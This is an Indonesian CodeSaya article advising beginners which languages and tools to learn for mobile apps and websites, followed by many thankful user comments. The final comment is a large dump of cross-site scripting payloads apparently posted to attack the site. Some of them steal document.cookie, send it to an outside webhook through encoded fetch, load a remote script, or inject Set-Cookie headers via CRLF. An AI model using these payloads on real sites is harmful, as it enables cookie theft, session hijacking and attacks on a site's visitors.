Apa Yang Harus Saya Pelajari?


Oleh Ganis (ganis)



Ganis

CEO and Founder of CodeSaya

@ganiseu9
https://ganis.net/


Ini adalah pertanyaan yang sering sekali ditanyakan di CodeSaya. "Bahasa coding apa yang harus saya pelajari?", atau "Saya harus mulai dari mana?", dan lain sebagainya. Well, jawabannya bergantung dengan apa yang anda ingin buat. Ada banyak hal yang bisa anda buat dengan coding, di sini saya hanya akan membahas:

  • Mobile Apps, dan
  • Website.

Beberapa teknologi yang bisa anda pelajari.

Mobile Apps

Mobile apps atau bahasa indonesianya adalah aplikasi handphone seperti misalnya Whatsapp, Instagram, Gojek, Tahu Bulat, dll. Membuat aplikasi handphone pun dibagi dua yaitu:

  • Aplikasi di iOS/iPhone
    • Bahasa Coding: Objective-C.
    • Software: Xcode (gratis).
    • Hardware: Komputer/Laptop Mac.
  • Aplikasi di Android
    • Bahasa Coding: Java.
    • Software: Eclipse atau Android Studio.
    • Hardware: Komputer/Laptop bisa Windows atau Mac.

Website

Website contohnya adalah CodeSaya yang sedang anda lihat ini atau halaman yang anda lihat dengan menggunakan peramban (browser) seperti misalnya Liputan6.com, SekolahKoding.com, Codepolitan.com, dll. Untuk website dibagi juga menjadi:

  • Website statis
    • Bahasa Coding: HTML, CSS, dan JavaScript.
    • Software: Text Editor (Notepad++, Vim, Sublime, dll) atau IDE.
    • Hardware: Komputer/Laptop bisa Windows atau Mac.
  • Website dinamis
    • Bahasa coding: Sama seperti website statis ditambah bahasa backend (Python, PHP, Ruby, Java, dll) dan juga database (Postgresql, MySQL, dll).
    • Software: Text Editor atau IDE yang bergantung dengan bahasa backendnya misalnya PyCharm untuk Python, atau PHPStorm untuk PHP, dll. Kalau saya pribadi menggunakan Vim dengan banyak plugins.
    • Hardware: Sama seperti website statis.
  • Website Apps
    • Deskripsi: Berbeda dengan website biasa, web apps akan membuat anda merasa sedang membuka aplikasi tetapi menggunakan peramban. Pengembangan web apps pun umumnya lebih rumit dibandingkan dengan website. Contohnya Google Maps, Facebook, dll.
    • Bahasa Coding: Sama dengan website dinamis, akan tetapi JavaScriptnya lebih rumit dan menggunakan framework seperti Angular.js, React.js, Ember.js dll.
    • Software dan Hardware: sama seperti website dinamis.

Penutup

Dengan artikel ini diharapkan bisa memberikan anda sebuah panduan awal agar anda tidak kebingungan untuk memulai dari mana. Sehingga jika misalnya anda ingin membuat aplikasi handphone di HP Android anda, berarti anda harus belajar codingan Java dan segera download Eclipse atau Android Studio ke komputer anda.

Di CodeSaya sekarang anda bisa belajar JavaScript, PHP, maupun Python, dan kelas lainnya menyusul! Gabung dengan CodeSaya atau follow Twitter dan Facebook kami sehingga jika ada kelas baru yang dibuka anda akan segera mendapatkan informasinya. Selamat belajar..!!

Level artikel ini adalah beginner.
Dituliskan oleh Ganis (ganis) pada 2 September 2016 dan telah dibaca sebanyak 42179 kali.
Tag: membuat aplikasi, membuat webapps, membuat website

Beri Jempol · 1211 jempol

berlangganan komentar



Komentar:

ur__DNA
131
53
· 8 tahun, 2 bulan yang lalu · 8 jempol

salam codesaya kak @ganis CEO and founder nya codesaya.com 
terimakasih kak.. atas lembaran-lembaran dan tapak tapak ilmu yang kak ganis ajarkan buat kami di sini. bertambah lagi ilmu-ku tentang struktur / spesifikasi dari sebuah website.
salam codesaya kak @ganis

Arrafi23
151
38
· 8 tahun, 1 bulan yang lalu · 6 jempol

Hai founder of codesaya,  salam kak butuh belajar bahasa C kak

aldiansyah
0
0
· 8 tahun, 1 bulan yang lalu · 2 jempol

sya gapunya laptop atau hp bagaimana min?

ur__DNA
131
53
· 8 tahun, 1 bulan yang lalu · 5 jempol

Saya juga minjem kok @aldiansyah. syarat nya adalah membangun kepercayaan kemudian jaga amanah dengan baik, mudah2an bisa lanjut yaa.. 

darks07
183
6
· 8 tahun, 1 bulan yang lalu · 3 jempol

keren nih website ,ane baru belajar Python  dan akhrinya ane memahami struktur dan syntaks penulisan yang benar. Thanks my favorite site : codesaya.com :) (Y)

mojo
20
0
· 8 tahun, 1 bulan yang lalu · 1 jempol

ijin belajar dari awal mas..

darks07
183
6
· 8 tahun, 1 bulan yang lalu · 2 jempol

mas tolong buat juga mas @GANIS : belajar Android dan JAVa, thnks mas sudahb bnyk perkembangn :)

darks07
183
6
· 8 tahun, 1 bulan yang lalu · 2 jempol

mas tolong buat juga mas @GANIS : belajar Android dan JAVa, thnks mas sudahb bnyk perkembangn :)

murti
295
3
· 8 tahun yang lalu · 1 jempol

Mantap!

hendrapy21
2
0
· 8 tahun yang lalu · 4 jempol

java min, pengen banget belajar. tapi web" lain bhs inggris semua

Kirafauzan
24
0
· 8 tahun yang lalu · 2 jempol

Webnya keren. Bisa belajar dasar2 coding

mahrizal
6
0
· 8 tahun yang lalu · 1 jempol

keren mas ganis bikin situs codesaya.com buat belajar banyak orang

Valent
24
0
· 7 tahun, 12 bulan yang lalu · 1 jempol

Butuh bahasa java nya nih kak 

Julius
6
0
· 7 tahun, 11 bulan yang lalu · 1 jempol

mantappp mas... makasih

mmyusup
94
0
· 7 tahun, 11 bulan yang lalu · 1 jempol

sangat bermanfaat,,, Terimakasih

abdulkadirsamani21
13
0
· 7 tahun, 9 bulan yang lalu · 1 jempol

sangat bermanfaat.. makasih mas

oyegh
0
0
· 7 tahun, 9 bulan yang lalu · 2 jempol

Mantap ini suatu hal baru yang ingin saya pelajari lanjutkan tolong di bantu saya betul-betul masih nol makasih mas ganis ilmunya sedikit demi sedikit akan saya pelajari semoga rejeki anda semakin lancar aamiin

yzaware
50
0
· 7 tahun, 9 bulan yang lalu · 2 jempol

sangat berguna,thanks

Efron
30
0
· 7 tahun, 8 bulan yang lalu · 1 jempol

Keren,website belajar interactive ini sangat membantu belajar pemrograman.keep it up !!

soleh_hudi79
0
0
· 7 tahun, 7 bulan yang lalu · 1 jempol

Great article, Mas Ganis. Saya baru mau belajar nih....! Mudah-mudahan tidak ada kata terlambat!

Sakoukhymhaey
30
0
· 7 tahun, 6 bulan yang lalu · 0 jempol

Wahh mantap bang bagus di coba/praktek lama" juga di tahu yakan, makasih bang ilmu nya ehehehe 

Dodi_Fariza
51
0
· 7 tahun, 6 bulan yang lalu · 1 jempol

makasih banyak makasih banyak :) :) saya akan belajar tiap hari, karena saya ada tujuan yaitu menjadi hacker. :) 

aamDev
109
0
· 7 tahun, 6 bulan yang lalu · 0 jempol

terimakasih banyak nice nice.... jempol100x

Flourecent
1
0
· 7 tahun, 6 bulan yang lalu · 0 jempol

Wiihh aku gktw apa", smoga dgn bergabungnya disini aku bisa mnjadi lebih maju hmm thx infonya @Ganis

Rahman18
0
0
· 7 tahun, 6 bulan yang lalu · 0 jempol

Kak say mau blajr website dong

eko.basuki
94
0
· 7 tahun, 5 bulan yang lalu · 0 jempol

Hai.. apakah ada materi bahasa pemrograman untuk C++?
karena itu yg pernah saya pelajari

dheo
31
1
· 7 tahun, 5 bulan yang lalu · 0 jempol

saya ingin jadi IT Security apa yang harus saya pelajari?PHP atau java atau yang lain?

anja
235
1
· 7 tahun, 5 bulan yang lalu · 2 jempol

trimakasih kak. sangat bermanfaat buat saya yang belum ngerti apa-apa.

yushril
61
0
· 7 tahun, 5 bulan yang lalu · 1 jempol

Cool...

Tgh
5
0
· 7 tahun, 5 bulan yang lalu · 0 jempol

tetimakasih saya baru mau belajar,,semoga saya bisa

looserporn
0
0
· 7 tahun, 5 bulan yang lalu · 0 jempol

want  to learn a lot about coding, wismilak

rikirf1
17
0
· 7 tahun, 5 bulan yang lalu · 0 jempol

Bahasa Coding: HTML, CSS, dan JavaScript.
belum ada ya disini!

shoni
17
0
· 7 tahun, 5 bulan yang lalu · 0 jempol

Tolong bantu saya ya dalam belajar oding nya

Kwicka
0
0
· 7 tahun, 4 bulan yang lalu · 0 jempol

Mantap

082188055209
13
0
· 7 tahun, 4 bulan yang lalu · 1 jempol

insyaallah masuk

mwhjogjaart
0
0
· 7 tahun, 3 bulan yang lalu · 1 jempol

makasih bos..semoga saya bisa mempelajari semua..maklum masih newbie

Reisha_green
34
0
· 7 tahun, 3 bulan yang lalu · 1 jempol

salam kenal,, mohon bantuannya  ya,,, ;D

putleng
18
0
· 7 tahun, 3 bulan yang lalu · 1 jempol

ok mantab

ahmsofi
0
0
· 7 tahun, 2 bulan yang lalu · 1 jempol

Salam code saya. Masih terlalu awam saya belajar coding.  Jadi mohon bantuannya ya

autoloka
0
0
· 7 tahun, 1 bulan yang lalu · 1 jempol

trimakasih banyak om , penjelasan awal sangat membantu , semoga saya bisa 

Ikhsan99
0
0
· 7 tahun, 1 bulan yang lalu · 0 jempol

Cara belajar gimna, gak ngerti

Aguspurwanto
0
0
· 7 tahun yang lalu · 0 jempol

Ok... Saya mulai belajar.. 

junkiss
2
0
· 7 tahun yang lalu · 1 jempol

Tolong ajarin y kak

Galang_Sahdam_Dergantama
35
0
· 6 tahun, 10 bulan yang lalu · 0 jempol

Makasih bang ganis :-)

Gasot_aja
0
0
· 6 tahun, 10 bulan yang lalu · 0 jempol

Mau bljr g py komputer, adakah alternatif lain. Hikshiks

harund
74
0
· 6 tahun, 10 bulan yang lalu · 0 jempol

assalamualaikum
mau tanya kan saya baru belajar, saat simulasi dah ikuti instruksi "nama".lenght. kok masi eror ya? mohon pencerahannya

ianfreecs
272
10
· 6 tahun, 10 bulan yang lalu · 0 jempol

Terima kasih, Semoga CodeSaya makin maju!

camgank
73
0
· 6 tahun, 9 bulan yang lalu · 0 jempol

assalaamualaikum,,
sangat bermanfaat, semoga sukses dan jadi ladang amal sholeh, amiin

doni90
1
0
· 6 tahun, 8 bulan yang lalu · 1 jempol

pengin buat aplikasasi kak

iqbalqmby
153
1
· 6 tahun, 8 bulan yang lalu · 2 jempol

gak sengaja nemu website ini dari kometar warganet di sebuah website yang ane juga lupa. Sangat bermanfaat. Semoga makin jaya!

chixkaxoferdosi
15
5
· 6 tahun, 8 bulan yang lalu · 0 jempol

terima kasih banyak ,sekarang saya ingin mulai belajar menjadi progamer handal

chixkaxoferdosi
15
5
· 6 tahun, 8 bulan yang lalu · 0 jempol

cara membuka situs resmi

Raziqi
192
0
· 6 tahun, 8 bulan yang lalu · 0 jempol

assalamualaikum,
terimakasih atas ilmunya...
semoga berkah...
saya seorang guru SD mau belajar untuk kemajuan pendidikan di Indonesia...

agil15
0
0
· 6 tahun, 6 bulan yang lalu · 0 jempol

saya mau belajar bahasa C bisakah?

Gaeitan18
11
0
· 6 tahun, 5 bulan yang lalu · 1 jempol

Saya pemula,jujur saja saya tidak tau harus memulai dari mana,adakah yg bersedia mengajari saya ??

syifa_habibi
0
0
· 6 tahun, 4 bulan yang lalu · 0 jempol

Mantep pembelajaranya cara selanjutnya apa ...

391971
2
0
· 6 tahun, 4 bulan yang lalu · 0 jempol

Pengetahuan saya soal bahasa program masih nol,semoga dengan ikut kelas ini bisa menambah pengetahuan dan bermanfaat terimakasih

Elreon
79
0
· 6 tahun, 3 bulan yang lalu · 0 jempol

tolong kalo bisa tambahkan java juga dong...

Syaiful190
0
0
· 6 tahun, 2 bulan yang lalu · 0 jempol

Salam, buat ceo codeSaya. Perkenalkan nama saya syaiful , saya anggota baru di forum code saya ini,  saya tertarik untuk menjadi bagian anggota di codeSaya karena ingin menambah pengetahuan coding saya untuk pengembangan web design saya. Saat ini saya sedang baru belajar web design coding tapi dengan program html, css dan jquery. Sebagai seorang pemula yg baru belajar coding tentuny masih banyak kesulitan yang saya kurang pahami di coding html, css dn jquery. Permasalahan yang buat saya sangat kesulitan adalah cara mengitegrasikan coding html css dan jquery, maklum namany juga baru mulai belajar. Smoga dengan bergabung jadi member di codeSaya, bisa menambah semnagat dn pengetahuan coding saya untuk developer web saya, tapi setelah saya baca materi yg ada di codeSaya ini ko' tidak materi html css dan jquery nya yaa ... apakah bagi seorang pemula yang ingin belajar coding dan ingin buat web design  bisa langsung pake python dan php ?? Mohon penjelasannya ... terima kasih 

Baqtiar78
0
0
· 5 tahun, 12 bulan yang lalu · 0 jempol

Semoga tambah manfaat bagi anak-anak saya 

herikiswanto37
20
0
· 5 tahun, 11 bulan yang lalu · 0 jempol

terimakasih artikelnya ini sangat membantu :)

anotherside
92
1
· 5 tahun, 9 bulan yang lalu · 0 jempol

izin belajar mas. semoga ilmunya bermanfaat :))

lupin99
9
0
· 5 tahun, 9 bulan yang lalu · 1 jempol

gimana otak ku tetep ga ngarti ini .. tp pengen banget bisa coding :')

Rizky.Mooduto
218
0
· 5 tahun, 8 bulan yang lalu · 1 jempol

Springboot & mobile, bagian awal untuk login menggunakan cline server, cline mobile dan servernya website..
saran saya 

fadhil9
2
0
· 5 tahun, 5 bulan yang lalu · 0 jempol

Terimakasih ilmu nya mas

Naufallimited_
48
9
· 5 tahun, 3 bulan yang lalu · 0 jempol

Inspiring, nice brother👍

Balkonhotel
0
0
· 5 tahun, 3 bulan yang lalu · 0 jempol

Terima kasih untuk Ganis ,semoga ilmu nya bermanfaat

Ichank
0
0
· 5 tahun, 2 bulan yang lalu · 0 jempol

Maaf perkenalkan saya Widodo, dari Cirebon, adakah yang dari Cirebon?

fajarudin24
108
4
· 5 tahun yang lalu · 0 jempol

min materi nya bisa ditambah lagi tidak sepeti java dan javascript

minflo
53
0
· 4 tahun, 11 bulan yang lalu · 0 jempol

Keren, salam dari @lukananakit

finog
133
0
· 4 tahun, 9 bulan yang lalu · 0 jempol

baru mau ngajar semoga bisa mengerti, karena umur sudah agak lumayan banyak juga   

ryansiri
159
1
· 4 tahun, 8 bulan yang lalu · 0 jempol

Terimakasih pak , codesaya ini jadi masuk bahan pembelajaran tentang pemrograman di sekolah saya . 

Freez3XP
24
0
· 4 tahun, 8 bulan yang lalu · 0 jempol

Doa kan ane semoga ane bisa mempelajari semuanya um 

Jeezara
36
0
· 4 tahun, 7 bulan yang lalu · 0 jempol

oke sip

sikampret
0
0
· 4 tahun, 7 bulan yang lalu · 1 jempol

bang saya masih awal untuk belajar coding jadi mohon bantuannya gimana terima kasih 

Nardi1415
6
0
· 4 tahun, 6 bulan yang lalu · 0 jempol

Terima kasih kak, sekarang saya tau harus belajar darimana, informasi nya sangat membantu.

adhen88
0
0
· 4 tahun, 5 bulan yang lalu · 0 jempol

Pas bngt..nih masuk awalnya disini...thanks om....

Kenyenye
5
0
· 4 tahun, 5 bulan yang lalu · 0 jempol

Trm kasih, masuklah sy dulu. Blm banyak yg dpt kukatakan.

mabdip
136
1
· 4 tahun, 1 bulan yang lalu · 0 jempol

Teruntuk kak Ganis yang sudah bersedia untuk membuat website pembelajaran mengenai programming berbahasa indonesia. Dengan penjelasan yang mudah dimengerti dan bahasa yang sederhana membuat enjoy ketika belajar di CodeSaya terutama dengan konsep lencana hehe. Terima Kasih kak semoga CodeSaya semakin sukses dan makin banyak kelas-kelas yang dibuka.

alexoah
213
0
· 4 tahun, 1 bulan yang lalu · 0 jempol

Terima kasih sudah berbagi ilmu, Kak Ganis.

sugeng5050
9
0
· 2 tahun, 9 bulan yang lalu · 0 jempol

Alhamdulillah Gan..

Dikdik_Mulyana
155
0
· 2 tahun, 8 bulan yang lalu · 0 jempol

Singkat padat jelas

bukansambo
0
0
· 1 tahun, 9 bulan yang lalu · 0 jempol

ngapain aja saya kemarin dah , kok bisabisanya baru ngeh dan pingin belajar codingan, ya Allah ,,,
terima kasih banyak om. moga makin mak nyos aja tutor lainya.  nyubi ijin ikut belajar dari dasar banget.

ivan_syahreza
49
0
· 1 tahun, 3 bulan yang lalu · 0 jempol

Allhamdulillah, Terimakasih atas ilmu yang bermanfaat dan menjadi ladang pahala untuk memberikan pengetahuan

aldy.kunxs_
0
0
· 2 bulan, 2 minggu yang lalu · 0 jempol

"><body/oNpagEshoW=(prompt)()>
"><body/oNpagEshoW=(prompt)(document. domain)>
"><input/onfocus=(confirm)(document. domain)>
"><body/oNpagEshoW=(confirm)(document. domain)>
"><body/onfocus=(confirm)(document. domain)>
"><Body/oNpagEshoW=(prompt)(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<noscript><p title="</noscript><img src=x onerror=alert(document.cookie)>">
<a href=java%26%23x0Dscript%26%230000058alert(document%26%230000046cookie%26%230000041>search
"><img/src=%20only=1%200nErRor=x=alert XSS'><!--
">><marquee><h1><A HREF="https://evil.com/">Click Here</A></h1></marquee>
/><img src=&#120;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&equals; &apos;&#102;&#101;&#116;&#99;&#104;&lpar;&grave;&sol;&sol;&#119;& #101;&#98;&#104;&#111;&#111;&#107;&period;&#115;&#105;&#116;&#101 ;&sol;&#98;&#102;&#48;&#56;&#99;&#54;&#57;&#101;&#45;&#98;&#52;&# 55;&#97;&#45;&#52;&#48;&#50;&#52;&#45;&#56;&#97;&#99;&#57;&#45;&# 100;&#100;&#53;&#100;&#53;&#49;&#97;&#102;&#51;&#57;&#100;&#51;&q uest;&#120;&equals;&grave;&plus;&#100;&#111;&#99;&#117;&#109;&#10 1;&#110;&#116;&period;&#99;&#111;&#111;&#107;&#105;&#101;&rpar;&a pos;&gt;>
<Img Src=//x55.is OnLoad BC=1sport(Src)>
"><A%20%252F="""Href=%20JavaScript:k=%270%27, top(k%2B%27lert%27)(origin)>
<a href="#" onclick="var w = window.open/*/(//); w.document.write//('Hello, world!'//); w.document.close//(//); w.print//(//); alert//('B1P4$$'/*/);">Click me</a>
<svg/onload=alert(1)><svg>
<svg-onload=alert(1)><svg> 
"><svg onload=alert&amp;#x27;#x00000040"1")>
"><svg+onload=alert&amp;#8F"1
"><svg onload=alert&alert&#x00000040"1")>
%20"&gt;&lt;svg onload=alert(1)&gt;
<style>jaVasCript:/*-/*\/'/"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle`
%0d%0a%20&lt;img src=1 onerror=alert(1)&gt;
"&gt;&lt;svg onload=prompt(document.domain);&gt;.php
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
?query=&lt;img/src/onerror=alert(ibro)&gt;
&lt;/title&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
&lt;image src =q onerror=prompt(8)&gt;
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
"&gt;&lt;a&gt;a&lt;/a&gt;&lt;img src=x onerror=alert(document.cookie)&gt;{{9-9}}';alert(0);://
&lt;!--&gt;&lt;svg onload=alert(1)--&gt;.aspx
%3Cimg%20src=x%20onerror=alert(1)%3E
&gt;&lt;script&gt;alert(123)&lt;/script&gt;
&lt;svg id=1 onload=confirm(1)&gt;
&lt;script&gt;alert1&lt;/script&gt;
&lt;img src=x onerror=location=atobamF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p&gt;
%0d%0a%20"&gt;&lt;img src=q onerror=alert(1)&gt;
&lt;img ignored=() src=x onerror=prompt(1)&gt;
guest/msft_a_guest_register.php?_browser=1&amp;title="&gt;&lt;svg/onload=alert(1)&gt;
window.name="&lt;img src=x onerror=alert(23)&gt;"
'"&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/marquee&gt;"&gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1)&gt;
&lt;script&gt;with(document)alert(cookie)&lt;/script&gt;
&lt;!--&gt;&lt;svg onload=alert(1)--&gt;.html
&lt;Img Src=OnXSS OnError=confirm(1)&gt;
"&gt;&lt;link rel="stylesheet" href="style.css"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
&lt;script&gt;alert(1)&lt;/script&gt;.aspx
&lt;body onscroll=javascript:alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;
<svg onload=alert(1)>
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() 
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--
!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
<img src=1 onerror=alert(1)>
""><svg onload=prompt(document.domain);>.php
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
%22%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
""><img src=x onerror=prompt(document.domain);>
?query=<img/src/onerror=alert(`ibro`)> 
</title><script>alert(document.domain)</script>
<image src =q onerror=prompt(8)> 
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
""><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
<!--><svg onload=alert(1)-->.aspx 
%3Cimg%20src=x%20onerror=alert(1)%3E
><script>alert(123)</script> 
<svg id=1 onload=confirm(1)> 
<script>alert`1`</script> 
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
%0d%0a%20"><img src=q onerror=alert(1)>
<img ignored=() src=x onerror=prompt(1)>
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
window.name="<img src=x onerror=alert(23)>"
'">><marquee><img src=x 
onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>with(document)alert(cookie)</script>
<!--><svg onload=alert(1)-->.html
""><svg onload=prompt(document.domain);>.html
document.createElement('div').innerHTML = "<img src=1 onerror=alert()>
""><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<input type="text" value="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* 
*/oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--
!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></input> 
<BODY ONLOAD=javascript:alert(1)>
<img src=1 onerror=alert(1)>
<script>+-+-1-+-+alert(1)</script>
<sCRipT>alert(1)</sCRiPt>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(Strin
g.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<script>onerror=alert;throw 1337</script>
"<!--><Svg OnLoad=confirm?.(/d3rk /)<!--1")"<!--
><Svg+OnLoad=confirm?.(/d3rk /)<!-- 
"<!--><Svg OnLoad=confirm?.(/d3rk /)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk /)<!--
<img src=1 onerror=alert(1)>.gif 
<img src=/x onerror=prompt(document.domain);>
""><svg onload=alert(1)>
<img src=xx: onerror=confirm(document.location)>
""><img/src/onerror=alert(`ibro`)> 
""><script>alert(1)</script><"
<--`<img/src=`%20onerror=confirm``>%20--!>
<Img Src=On OnError=alert(1)>
<img src =q onerror=prompt(8)> 
<script src=//0-a.nl/conf.js></script> 
<Img Src=OnXSS OnError=confirm(document.cookie)>
'>'\n><script>alert(2);</script> 
d1bvs</script><script>alert(`XSS`)</script>c579g
""><img src=x onerror=prompt(document%2Edomain);>
<style><img src="</style><img src=x 
onerror=javascript:alert(/AmoloHT/)//"> 
>%0D%0A%0D%0A<x '=foo"><x foo='><img src=x 
onerror=javascript:alert(`cloudfrontbypass`)//'> 
""><svg/onload=alert(1);> 
%3E%3Cbody%20onload=javascript:alert(1)%3E
<--`<img/src=` onerror=confirm``> --!> 
""><img src=x onerror=prompt(1);> 
</script><script>alert(123)</script> 
""><script>alert(String.fromCharCode(88,83,83))</script>
'\u003E'\u0022><script>alert(2);</script>
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<script charset="\x22>javascript:alert(1)</script>
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
<p><img/src/onerror=alert(`ibro`)></p> 
'><script>alert(123)</script> 
/><svg src=x onload=confirm(document.domain);>
'>'+'><script>alert(2);</script> 
"<script>1-confirm(0);</script>"/> 
>"'><script>alert(2);</script> 
"></tag><svg onload=alert(1)> 
""><img src=a onerror=alert(document.location)>
<script>top[`alert`]()</script> 
""><img src=x onerror=(prompt(document.domain));>
<script>javascript:alert(1)</script> 
"/><script>+-+-1-+-+confirm(1)</script> 
<! foo="><script>javascript:alert(1)</script>">
""><img src=x onerror=alert(1);> 
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<script>alert(1)</script> 
%27%3E'><script>alert(2);</script> 
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
%3F%20"><img src=q onerror=alert(1)> 
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<?tag x="-->" test="<img src=x onerror=alert(1)//">
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(document.domain)>
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
""><body/oNpagEshoW=(confirm)(document.domain)>
<script>var{a:onerror}={a:alert};throw 1</script>
""><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> 
<img src=x onerror=prompt()> 
%20<script>prompt(document.domain)</script>
""><img src=x onerror=prompt(document.cookie);>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script> 
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x 
onerror=javascript:alert(`cloudfrontbypass`)//'> 
page=1"><Svg Only=1 OnLoad=confirm(document.domain)>
""><img src=x\%28\%29\ onerror=prompt(document.domain);>
%20"><img src=q onerror=alert(1)> 
<><img src=1 onerror=alert(1)> 
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--
%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
<script>alert(1234)</script> 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(Strin
g.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'\u003E'\u0022><script>alert(2);</script> 
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<script charset="\x22>javascript:alert(1)</script>
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
<p><img/src/onerror=alert(`ibro`)></p> 
'><script>alert(123)</script> 
/><svg src=x onload=confirm(document.domain);>
'>'+'><script>alert(2);</script> 
"<script>1-confirm(0);</script>"/> 
>"'><script>alert(2);</script> 
"></tag><svg onload=alert(1)> 
""><img src=a onerror=alert(document.location)>
<script>top[`alert`]()</script> 
""><img src=x onerror=(prompt(document.domain));>
<script>javascript:alert(1)</script> 
"/><script>+-+-1-+-+confirm(1)</script> 
<! foo="><script>javascript:alert(1)</script>">
""><img src=x onerror=alert(1);> 
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<script>alert(1)</script> 
%27%3E'><script>alert(2);</script> 
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
%3F%20"><img src=q onerror=alert(1)> 
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<?tag x="-->" test="<img src=x onerror=alert(1)//">
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
